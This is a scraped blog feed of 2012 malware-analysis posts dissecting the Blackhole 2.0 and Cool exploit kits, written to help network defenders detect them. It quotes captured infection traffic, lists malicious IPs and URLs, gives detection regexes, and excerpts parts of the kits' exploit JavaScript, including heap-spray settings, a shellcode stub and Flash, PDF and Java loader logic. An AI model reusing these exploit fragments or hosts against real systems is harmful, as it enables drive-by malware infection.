HTTP/1.1 200 OK<br />
Server: nginx/1.0.15<br />
Date: Sat, 24 Nov 2012 19:33:58 GMT<br />
Content-Type: application/java-archive<br />
Connection: keep-alive<br />
Content-Length: 10940<br />
ETag: "c9a6c96d607f63a618e07759c2f7391e"<br />
Last-Modified: Sat, 24 Nov 2012 19:32:36 GMT<br />
Accept-Ranges: bytes<br />
<br />
<br />
PKñ¨vAMETA-INF/þÊPKPKñ¨vAMETA-INF/MANIFEST.MFóMÌËLK-.ÑK-*ÎÌϳR0Ô3àår.JM,IMÑuª˜éÄ+<br />
h—æ)øf&åW—¤æ+xæ%ëiòrù&fæé:ç$[)d”órñrPKAñ WWPKu¥vAhw.class<br />
<br />
<br />
<br />
<br />
<b>Finally the Binary:</b><br />
<br />
<br />
<br />
GET /less/pounds-value_mean.php?if=1i:1m:2w:1g:1o&pe=1n:30:30:31:2v:2w:1o:1f:1f:3<br />
1&k=1f&rg=m&ht=b HTTP/1.1<br />
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29<br />
Host: u91s.info<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/1.0.15<br />
Date: Sat, 24 Nov 2012 19:33:59 GMT<br />
Content-Type: application/x-msdownload<br />
Connection: keep-alive<br />
Content-Length: 131072<br />
Pragma: public<br />
Expires: Sat, 24 Nov 2012 19:32:37 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
<b>Content-Disposition: attachment; filename="contacts.exe"</b><br />
Content-Transfer-Encoding: binary<br />
<br />
<br />
MZÿÿ¸@躴Í!¸LÍ!This program cannot be run in DOS mode.<br />
<br />
<b><br /></b>
<b>References:</b><br />
http://www.securitynotes.ro/2012/11/discovering-blackhole-part-i.html<br />
http://integriography.wordpress.com/2012/11/19/dissecting-a-blackhole-2-pdf-mostly-with-peepdf/<br />
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=baeccb2947004ded2dc9079e89e42b41<br />
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrH3ELFCs_SJwhmmh6aLTFCPqS-rR_ln5dYJ57CUbUM5of7XPs3wLD-QlDVwEtq-68uGKj9fXDbyiCjW0aHR-OKY38txLQ6evHgM2dYbsce0cMmEN7Druq_OtZVgzm-YFpA9tMyzhmGixg/s1600/screenshot_1451.png<br />
http://www.scumware.org/report/94.250.251.61</div>
Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-6932549875085962702012-11-17T05:30:00.001-08:002012-11-17T13:38:39.204-08:00Cool Exploit Kit - URL StructureThe write up from <a href="http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html">malware.dontneedcoffee.com</a> on Cool Exploit Kit is excellent.<br />
<br />
Here, I will concentrate on how it is operating with an emphasis on detection based on URL structure. Please note, variants are possible and these may change, but as of now, this is what I am seeing. More to come, check back again.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnKgNaq_OUSQiN0ovJlghTVsPEhLuPTpGmTADAQz7x2A2sSJmU11IUtZqrNe-DH2RYh4D5agDBirC14EL6RqHdRntMQ9DIL6YZE9uyXrgO2dYYt2eLKH7zVDFtR3TQe2PmSM0KoeCjDs/s1600/cool+exploit+benign.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnKgNaq_OUSQiN0ovJlghTVsPEhLuPTpGmTADAQz7x2A2sSJmU11IUtZqrNe-DH2RYh4D5agDBirC14EL6RqHdRntMQ9DIL6YZE9uyXrgO2dYYt2eLKH7zVDFtR3TQe2PmSM0KoeCjDs/s640/cool+exploit+benign.PNG" width="640" /></a></div>
<br />
<br />
<h2>
<b>Cool Exploit Kit URL Structure</b></h2>
The static entries in the observed Cool Exploit Kit contains the following URLs.<br />
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">/32size_font.eot</span><br />
<span style="font-size: large;">/64size_font.eot</span><br />
<span style="font-size: large;">/media/field.swf</span><br />
<span style="font-size: large;">/media/pdf_new.php</span><br />
<span style="font-size: large;">/media/pdf_old.php</span><br />
<span style="font-size: large;">/media/score.swf</span><br />
<span style="font-size: large;">/media/new.jar</span><br />
<span style="font-size: large;">/media/file.jar</span><br />
<span style="font-size: large;">/bagdfssdb.jar</span><br />
<span style="font-size: large;">/flash.swf?info=[a-f0-9]{32,}</span><br />
<br />
<b style="font-size: x-large;">Binary Regex: </b><span style="font-size: large; white-space: pre-wrap;">\/[a-z]\/f\.php\?k=\d(&e=\d&f=\d)?$</span><br />
(Credit <a href="http://www.emergingthreats.net/">Emergingthreats</a> <span style="white-space: pre-wrap;">sid:2015873)</span><br />
<b><br /></b>
The current implementations of this exploit kit reside under single letter subdirectories. i.e. "/r/media" or "/t/media", but it appears any single letter is possible.<br />
<br />
<h2>
Known Repeat Offenders:</h2>
<br />
46.21.148.217<br />
184.170.142.13<br />
85.143.166.112<br />
193.0.179.5<br />
<div>
<br /></div>
<br />
<h3>
PluginDetect 0.7.9</h3>
<br />
<blockquote class="tr_bq">
<span style="color: red;"> <body onload='try{window.focus();}catch(e){}'></span><br />
<span style="color: red;">var PluginDetect={</span><br />
<span style="color: red;"> version:"0.7.9",</span></blockquote>
<br />
It is using plugin detect. It is doing the math and extracting the version numbers, I think we are all familiar with this (beating a dead horse).<br />
<br />
<br />
<blockquote class="tr_bq">
<span style="color: red;">JavaVersions:[[1,9,1,40],[1,8,1,40],[1,7,1,4</span></blockquote>
<blockquote class="tr_bq">
<span style="color: red;">0],[1,6,0,40],[1,5,0,30],[1,4,2,30],[1,3,1,30]],query:function(){</span><br />
<span style="color: red;"> var a=this,e=a.$,b=a.$$,c=(a.hasRun||a.disabled());</span><br />
<span style="color: red;"> a.hasRun=1;</span><br />
<span style="color: red;"> if(c){</span><br />
<span style="color: red;"> return a}</span><br />
<span style="color: red;"> var i=[],k=[1,5,0,14],j=[1,6,0,2],h=[1,3,1,0],g=[1,4,2,0],f=[1,5,0,7],d=b.getInfo?true:false,l={</span><br />
<span style="color: red;"> };</span></blockquote>
<br />
Now, let's look deeper into what is it is asking for based on your versions:<br />
<br />
<h3>
Flash</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioPPUZTawHROYS_WoPL_oqCelWdDS4mpr85tpXRpnqsY58qytxxJxpSFcBZFnV0qM4nkBHZwppVy_GHTXlXl7fVq91puFPIk9gT07UjH-bpaHaTxDaQR4lrm29g8HDvsOOTrDsoecwu9M/s1600/field.swf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioPPUZTawHROYS_WoPL_oqCelWdDS4mpr85tpXRpnqsY58qytxxJxpSFcBZFnV0qM4nkBHZwppVy_GHTXlXl7fVq91puFPIk9gT07UjH-bpaHaTxDaQR4lrm29g8HDvsOOTrDsoecwu9M/s640/field.swf.png" width="640" /></a></div>
<div>
<br /></div>
<blockquote class="tr_bq">
<span style="color: red;">function getCN(){</span><b><span style="color: red;"> return "../media/score.swf"}</span></b><span style="color: red;"> function getBlockSize(){</span><span style="color: red;"> return 1024}</span><span style="color: red;"> function getAllocSize(){</span><span style="color: red;"> return 1024*1024}</span><span style="color: red;"> function getAllocCount(){</span><span style="color: red;"> return 300}</span><span style="color: red;"> function getFillBytes(){</span><span style="color: red;"> var a='%u'+'0c0c';</span><span style="color: red;"> return a+a}</span><span style="color: red;"> function getShellCode(){</span><br />
<span style="color: red;">oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='..<b>/media/field.swf' /></b></span></blockquote>
Then we have this possibility<br />
<br />
<blockquote class="tr_bq">
<span style="color: red;"><param name='movie' value='../media/flash.swf?info="+avmurl+"' /><embed src='../media/flash.swf?info="+avmurl+"' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>"}</span></blockquote>
While leads to something like this:<br />
<span style="font-family: Segoe UI, Arial, sans-serif;"><span style="font-size: 12px;">hxxp://monstercompanionsbonuses.info/data/flash.swf?info=02e6b1525353caa8adb5b7b55154335730b4b55732b6b17e08e8888930f129f18f4889a8888f096949898e70487096a91637293629b67a4b726e7f</span></span><br />
<br />
<br />
Ok great, we have score.swf, flash.swf?info= and field.swf. This is strangely familiar (rolling eyes).<br />
<br />
<h3>
Cool Exploit PDF Logic</h3>
<span style="font-family: inherit;">In the PDF logic, if the version of Adobe detected is lower than 8, it sets a variable vver to "old", if it is greater than or equal to 8, it sets vver to new. The exploit is recognized as <span style="text-align: center;">Adobe PDF Memory Corruption /Ff Dictionary Key Corruption</span></span>I<br />
<br />
<blockquote class="tr_bq">
<span style="color: red;">if (pdf[0] < 8){</span><br />
<span style="color: red;"> vver = "old";</span><br />
<span style="color: red;"> setTimeout("FlashExploit()", 8003);</span></blockquote>
<blockquote class="tr_bq">
<span style="color: red;">else if (pdf[0] == 8 || (pdf[0] == 9 && pdf[1] < 4)){</span><br />
<span style="color: red;"> vver = "new";</span><br />
<span style="color: red;"> setTimeout("FlashExploit()", 7004);</span></blockquote>
<br />
<blockquote class="tr_bq">
<span style="color: red;">d.innerHTML = '<iframe src="../media/pdf_' + vver + '.php"></iframe>';</span></blockquote>
<br />
So now what does it do with this information?<br />
<br />
<b>It builds a URL "/media/pdf_ +vver + .pdf - so /media/pdf_new.php" or /media/pdf_old.php'</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHp2OhkPWOoQn66KhspjXn6D20vLRMviUIKbpZieVW-NfT8tmdu6_vluTnaotMNleGm56d3CzRIrzsAMs-e6Ui9llc5r10N2FsuFP-mQGOzWruGT2Ga5Fa-coGiYt4JjDIZE8mXRA8c5k/s1600/pdfnew.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="365" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHp2OhkPWOoQn66KhspjXn6D20vLRMviUIKbpZieVW-NfT8tmdu6_vluTnaotMNleGm56d3CzRIrzsAMs-e6Ui9llc5r10N2FsuFP-mQGOzWruGT2Ga5Fa-coGiYt4JjDIZE8mXRA8c5k/s400/pdfnew.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #d1f0ff; font-family: 'Segoe UI', Arial, sans-serif; font-size: 12px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<h3>
Now, let's look at the Java:</h3>
<br />
<blockquote class="tr_bq">
<span style="color: red;"> if (javax[1]==7){</span><br />
<span style="color: red;"> variant = "new";</span><br />
<span style="color: red;"> val1="0b0909041f";</span><br />
<blockquote class="tr_bq">
<span style="color: red;"> val2="313109441a3a19041744093c0b32091a3a0044213a3c38383144312c3c040b043d1139270235391c022c391c";</span></blockquote>
</blockquote>
<blockquote class="tr_bq">
<span style="color: red;"> else {<br /> variant = "file";<br /> val1="0b0909041f";<br /> val2="313109441a3a19041744093c0b32091a3a0044213a3c38383144312c3c040b043d1139370235391c022c391c";</span></blockquote>
<span style="color: red;"><br /></span>
<br />
<blockquote class="tr_bq">
<span style="color: red;">WIDTH="200" HEIGHT="200"><PARAM NAME="CODE" VALUE="bagdfssdb"><PARAM NAME="CODEBASE" VALUE="../media/"><PARAM NAME="ARCHIVE" VALUE="' +<b> variant + '.jar</b>"><param name="type" value="application/x-java-applet;version=1.6"><param name="val" value="'<b>+val1+</b>'"/><param name="prime" value="<b>'+val2+'</b>"/></object>';.</span></blockquote>
Notice the "codebase" value = ../media/". Great.<br />
So presumably, we should be looking for get requests containing "/media/", so each of these files resides under media, with the potential exception of some of the jar files whose structure appear to be built from parameters inside the exploit kit.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5E0Fkp7OU09RVz4hURwhSj_sxUZrks1tlS0e8o_ey8dUqYfscATt_ZD4PTOMY9qMN0n-d6HUcyk07k0J0OZHfj01bEHegBW0e54bPEy3R8odzJWEqQJjnNvCZQsNsG_PZfFFQk1SRiHA/s1600/file.jar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="17" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5E0Fkp7OU09RVz4hURwhSj_sxUZrks1tlS0e8o_ey8dUqYfscATt_ZD4PTOMY9qMN0n-d6HUcyk07k0J0OZHfj01bEHegBW0e54bPEy3R8odzJWEqQJjnNvCZQsNsG_PZfFFQk1SRiHA/s640/file.jar.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
I also ran into hxxp://now.kitchenssinks.co.uk/t/media/new.jar<br />
<br />
I am still looking into the predictability of additional jar files.<br />
<b><br /></b>
<br />
<b>Binary:</b><br />
So far, the only binary get request I have been able to observe is /f.php?k=. It should be noted that there are known variations with additional parameters which is represented well by<span style="font-family: inherit;"> <a href="http://www.emergingthreats.net/">Emergingthreats Regex</a> <span style="white-space: pre-wrap;">\/[a-z]\/f\.php\?k=\d(&e=\d&f=\d)?$</span></span><br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoVQSb4iMI4xp5L4dowU_Ab4k2_l8sUBIx5ZIIps6s3z4s27zc8mOZJJ_d7riEl-x7sXKlgu0MQe3mr-qhuRVoqu7CtIGjTqwT1AO9v6LnojinqCg_di1al7wtQFwUf10tZAMoI_E9MR0/s1600/cool+ek+binary.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoVQSb4iMI4xp5L4dowU_Ab4k2_l8sUBIx5ZIIps6s3z4s27zc8mOZJJ_d7riEl-x7sXKlgu0MQe3mr-qhuRVoqu7CtIGjTqwT1AO9v6LnojinqCg_di1al7wtQFwUf10tZAMoI_E9MR0/s400/cool+ek+binary.PNG" width="400" /></a></div>
<br />
<h2>
Conclusion:</h2>
The Cool Exploit Kit can be detected in its current form. I hope to have more soon. As always, I welcome thoughts, comments and collaboration. @fknsec<br />
<h2>
References:</h2>
<br />
http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html<br />
http://threatpost.com/en_us/blogs/new-java-attack-introduced-cool-exploit-kit-111212<br />
http://www.malwaredomainlist.com/forums/index.php?action=recent<br />
http://www.avgthreatlabs.com/webthreats/info/cool-exploit-kit/<br />
http://jsunpack.jeek.org/?report=6aa9697f44b5f61ba3cb76b64935694c351f35ff<br />
http://doc.emergingthreats.net/bin/view/Main/2015887<br />
<br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-46962132761476229452012-11-01T11:21:00.000-07:002012-11-05T07:13:59.938-08:00Deeper into Blackhole, URLs and dialects.<span style="font-size: x-small;">Written by Frank Angiolelli, CISSP</span><br />
<br />
I am still focused on Blackhole URLs, specifically the binary get request. As I look deeper into the URL, tightening up the regex seems possible, as well as broadening the detection to catch those that use longer hex values. There are distinct dialects in the binary get request that are emerging.<br />
<br />
<br />
<span style="font-family: inherit; font-size: large;"><b>The improved Regex</b></span><br />
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b><i>Binary Get Request:</i></b></span></div>
<div style="text-align: center;">
<b>\.php\?\w{2,8}\=(0[0-9a-b]|3[0-9]){5,32}\&\w{2,9}\=(0[0-9a-b]|3[0-9]){10}\&\w{1,8}\=\d{2}\&\w{1,8}\=\w{1,8}\&\w{1,8}\=\w{1,8}</b><br />
<b><br /></b>
<b><i>Optimized by suggestions from Will Metcalf @node5. Thanks Will.</i></b><br />
<br />
<span style="font-size: large;"><b><i>PDF Get Request:</i></b></span><br />
<div style="text-align: center;">
\.php\?\w{2,9}\=(0[0-9a-b]|3[0-9]){5}\&\w{3,9}\=(3[0-9a-f]|4[0-9a-f])\&\w{3,9}\=(0[0-9a-b]|3[0-9]){10}\&\w{3,9}\=(0[0-9a-b]{1,8})00020002<br />
<br />
<i>Thanks to @Dr4g0nFlySm0k3 for widening out my sample set and testing.</i></div>
</div>
<br />
<br />
<h3>
<span style="font-size: large;">Dialects in the Binary Get Request:</span></h3>
While the exact meaning of the dialects is unknown to me at this time, there are three distinct dialects I have seen in the binary get requests in the wild up to this point. By dialects, I'm referring to a particular pattern variation which is similar among groups of binary get requests.<br />
<br />
<b>Dialect 1: The 2by10</b><br />
In this dialect, the first parameter is 2 letters followed by 10 hex (2by10). The second parameter is 2 characters followed by a 20 hex(2by20), then 1 character followed by two digits(1by2), 2by1 and 2by1. This seems to be the most common that I have seen in the wild and was the basis for my first regex to detect the binary.<br />
<i>/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m</i><br />
<br />
<b>Dialect 2: The 3by10</b><br />
In this dialect, it goes 3by10, 3/4by20, the remainder varies however the third parameter is consistently a two digit number. I do not have enough of these to extrapolate a predictable pattern yet.<br />
<i><br /></i>
<b>Dialect 3:The 4/5/6by64</b><br />
In this dialect, the first parameter is 4,5 or 6 letters followed by a 64 character hex (4/5/6by64). The second parameter is 8 or 9(char) by 20 character hex (8/9by20). There is fluctuation in the remaining parameters but the third parameter is always a two digit number.<br />
<span style="font-family: inherit;">/links/tune-spreads-action.php?uxytgf=3306380338020a0b0b02360609350608350409050334350933080a3505063308&abnczdde=06090a3708050a063402&jvfagfn=02&pusr=uwelha&tibqqyl=rpfarbmb</span><span class="nl" style="border-bottom-color: gray; border-bottom-style: solid; border-bottom-width: 1px; color: grey; display: inline-block; margin-left: 2px; padding-left: 3px;"></span><br />
<br />
<span class="nl" style="border-bottom-color: gray; border-bottom-style: solid; border-bottom-width: 1px; color: grey; display: inline-block; margin-left: 2px; padding-left: 3px;"></span>
/detects/stones-instruction_think.php?hij=0802340202&fwi=0b0a33350a0735020405&nktu=03&wai=mpevbgmy&xsrpwq=rjbgqjpy<br />
<br />
This is only my observations of the values in the field and could represent a fingerprint which could be used to identify different actors, different versions of the exploit kit or different setups of the exploit kit.<br />
<br />
<h3>
</h3>
<h3>
What are the Hex values?</h3>
<div>
<br /></div>
The hex values are comprised of two separate things, randomized garbage values and numeric digits intermixed. All hex values are either 00-0b or 30-39. the 00-0b are likely garbage, while the 30-39 represent numbers.<br />
<br />
Any of us that analyzed or detected the old version of blackhole are familiar with the old f= & e= parameters, well I'm here to tell you it appears they still exist, only they have been morphed. In the new version of blackhole contains the same parameters obfuscated by using garbage hexidecimal values mix into each number as well as random characters inserted for good measure.<br />
<br />
<b>Let's break down one of the URLs.</b><br />
<i>/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m</i><br />
<br />
<b>0735020b0b = 5</b><br />
07 = bell<br />
35 = 5<br />
02 = start of the text<br />
0b = vertical tab<br />
0b = vertical tab<br />
<br />
<b>3307093738070736060b = 3786</b><br />
33 = 3<br />
07 = bell<br />
09 = Horizontal tab<br />
37 = 7<br />
38 = 8<br />
07 = bell<br />
07 = bell<br />
36 = 6<br />
06 = Acknowledge<br />
0b = Vertical tab<br />
<br />
<b><br />Let's do another one.</b><br />
<i>/links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&pr=n&od=v</i><br />
<br />
<b>050934030b = 4</b><br />
05 = Enquiry<br />
09 = Horizontal tab<br />
34 = 4<br />
03 = EndofText<br />
0b = bell<br />
<br />
<b>0a050304380b37370a36 = 8776</b><br />
<span style="font-family: inherit;">0a = Line feed</span><br />
<span style="font-family: inherit;">05 = Enquiry</span><br />
<span style="font-family: inherit;">03 = EndofText</span><br />
<span style="font-family: inherit;">04 = EndofTransmission</span><br />
<span style="font-family: inherit;">38 = 8</span><br />
<span style="font-family: inherit;">0b = bell</span><br />
<span style="font-family: inherit;">37 = 7</span><br />
<span style="font-family: inherit;">37 = 7</span><br />
<span style="font-family: inherit;">0a = Line feed</span><br />
<span style="font-family: inherit;">36 = 6</span><br />
<br />
<br />
Both of these URLs are of dialect 2by10. You will note that the first parameter turns out to be a single digit while the second value is four digits.<br />
<br />
<br />
<span style="font-family: inherit;"><b>Now let's go back to the fake AV infection URLs I looked at on September 15th</b></span><br />
<span style="font-family: inherit;">hxxp://108.178.59.39/links/reveals_formed.php?udvf=03080407333603030a3302340235073836093508033706363836353505080833&tvaxpmbue=0a09380b0a3508360208&rdm=02&bnvru=dolz&gwxjfli=ewsxs</span><br />
<br />
<br />
03080407333603030a3302340235073836093508033706363836353505080833 = 363458657686553<br />
<br />
<br />
0a09380b0a3508360208 = 856<br />
<br />
This follows a 4by64 dialect and the value of the first parameter is 363,458,657,686,553 and the second is 856.<br />
<br />
<b>Now Let's look at another one:</b><br />
<span style="font-family: inherit;">/links/tune-spreads-action.php?uxytgf=3306380338020a0b0b02360609350608350409050334350933080a3505063308&abnczdde=06090a3708050a063402&jvfagfn=02&pusr=uwelha&tibqqyl=rpfarbmb</span><span class="nl" style="border-bottom-color: gray; border-bottom-style: solid; border-bottom-width: 1px; color: grey; display: inline-block; margin-left: 2px; padding-left: 3px;"></span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">This is a 6/64 dialect where the first parameter equals </span>38,865,545,353 and the second parameter equals 74.<br />
<br />
Thanks to those who contributed their URLs to help broaden the analysis set and @Dr4g0nFlySm0k3 for discussions on the subject. #malwaremustdie.
Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com2tag:blogger.com,1999:blog-407866255126559296.post-25322601080838884212012-10-22T13:39:00.003-07:002012-10-24T10:16:38.057-07:00Blackhole 2.0 Binary Get Request<span style="font-size: x-small;">Written by Frank Angiolelli, CISSP</span><br />
<br />
I am still focused on Blackhole 2.0 and<a href="http://fortknoxnetworks.blogspot.com/2012/10/blackhhole-exploit-kit-v-20-url-pattern.html" target="_blank"> in my last article here</a>, I examined the URL pattern. The regex in this previous article is good at detecting the entry points and the exploit as it is occurring, but not the binary get request. This was because of too many false positives for sites like facebook (credit for the teamwork to <a class="twitter-atreply pretty-link" dir="ltr" href="https://twitter.com/Dr4g0nFlySm0k3" style="background-color: whitesmoke; color: #0084b4; font-family: Arial, sans-serif; font-size: 14px; line-height: 18px; text-decoration: none;"><s style="background-color: whitesmoke; color: #66b5d2; font-family: Arial, sans-serif; font-size: 14px; line-height: 18px; text-decoration: none;">@</s><b style="background-color: whitesmoke; color: #0084b4; font-family: Arial, sans-serif; font-size: 14px; font-weight: normal; line-height: 18px; text-decoration: underline;">Dr4g0nFlySm0k3</b></a>). Today, I focused on getting the pattern for the binary get request. <br />
<br />
This is an ongoing series where my intel will be posted as I get it. Feedback to me on twitter <a href="https://twitter.com/search?q=fknsec&src=typd" target="_blank">@fknsec</a>. Also, check out #malwaremustdie on twitter.<br />
<br />
<br />
<div style="text-align: center;">
Blackhole 2.0 Entry Point/PDF/PK Pattern<br />
Content type/MIME type:application/pdf<br />
<br /></div>
<div style="text-align: center;">
\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$</div>
<div style="text-align: center;">
</div>
<div style="text-align: center;">
Blackhole 2.0 Binary Get Request Pattern<br />
Content type/MIME Type: application/x-msdownload</div>
<br />
<div style="text-align: center;">
\.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$</div>
<br />
<div style="text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghrjXFwA0p57DnIdpgSoG61l8nOHzad9xCucr9KFNgchyed_Kbe0KQWTcI76JAwZaV4virTyyGg3F74eU83QreSp7kvi0dVsB4lOraV2pncfh6C3_yeVaVD34zh1RyirWHatxaKI9W8VQ/s1600/blackhole-regex-binary-get-request-fortknoxnetworks.blogspot.com.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghrjXFwA0p57DnIdpgSoG61l8nOHzad9xCucr9KFNgchyed_Kbe0KQWTcI76JAwZaV4virTyyGg3F74eU83QreSp7kvi0dVsB4lOraV2pncfh6C3_yeVaVD34zh1RyirWHatxaKI9W8VQ/s320/blackhole-regex-binary-get-request-fortknoxnetworks.blogspot.com.png" width="320" /></a></div>
<br />
<br />
<h3>
<span style="font-size: large;">Blackhole 2.0 - All About the PDF</span></h3>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ARnKMkYTFipFflSYHMxBoHaag-cIJeUVSpFrF5MBUWhedmBwLyFHnar-bKsQxJJUgDToF2AI43eOvCKA_bmXMqqHaNGX4ILE8Z-lt69g8P9PA4XVojxD6xV67_ClYEIDsaOv20-_Vzg/s1600/backhole-adobe-not-installed.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ARnKMkYTFipFflSYHMxBoHaag-cIJeUVSpFrF5MBUWhedmBwLyFHnar-bKsQxJJUgDToF2AI43eOvCKA_bmXMqqHaNGX4ILE8Z-lt69g8P9PA4XVojxD6xV67_ClYEIDsaOv20-_Vzg/s200/backhole-adobe-not-installed.png" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>Screen Cap 1:<br />Adobe Reader uninstalled, still prompts for PDF.</i></td></tr>
</tbody></table>
So far, I have only observed instances where a get request for the root php file is made, which contains an applet archive, the second request response is a PDF download, followed by a PK jar file, followed by the binary get request. This is so predictable that when I removed Adobe Reader from my lab, the website still requested that I download the PDF and asked me where to save it (see Screen Cap 1)<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheR8S5cQvNxjMubEf-2iTNzc4H2N0IBBBzEilL8hMHNcGbHLAyNQus3i70Bk4az239DOGyFu-lxmVMEYgMO35ECd5Cs1CgWS-_-K7RGWTYkHK5Ig4bIi5bA5zzB4e6S8GbqAMikl21G9k/s1600/blackhole-bankofamerica.com+website.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheR8S5cQvNxjMubEf-2iTNzc4H2N0IBBBzEilL8hMHNcGbHLAyNQus3i70Bk4az239DOGyFu-lxmVMEYgMO35ECd5Cs1CgWS-_-K7RGWTYkHK5Ig4bIi5bA5zzB4e6S8GbqAMikl21G9k/s200/blackhole-bankofamerica.com+website.png" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>Screen Cap 2<br />This sample really, really wanted me to log into Bank of America</i>.</td></tr>
</tbody></table>
As a side note - one of the malware samples was an impatient password stealer that actually launched IE and took me to the legitimate Bank of New York web page. (See Screen Cap 2).<br />
<br />
Once the PDF is downloaded and executed, the system requests one or a series of PK files which java executes.<br />
<br />
<h3>
<span style="font-size: large;">Trying to Stop the Exploit (and failing miserably)</span></h3>
I tried a series of moves to stop the exploit, all but one of which failed, and the other was inconclusive.<br />
<br />
<ul>
<li>Disabling Javascript in Adobe Reader - failed to stop the exploit.</li>
<li>Configured "Security Enhanced" to prevent any PDF from accessing the internet - failed to stop the exploit.</li>
<li>Removed Adobe Reader - Website prompted me to save the PDF (see second screen cap)</li>
</ul>
<ul>
<li>Installed Foxit Reader with "Security Enhancements" enabled - failed to stop the exploit.</li>
<li>Configured DEP for all windows programs - inconclusive. I saw a binary get request and the malware downloaded and showed up in the task manager, but then it disappeared. I need more data on this before I can speak further on this.</li>
</ul>
<div>
Interesting enough a majority of the cases I reviewed, the actual malware launched was<b> install_0_msi.exe followed by a KB<random number>.exe</b>, presumably a pony downloader followed by Zeus-family.</div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
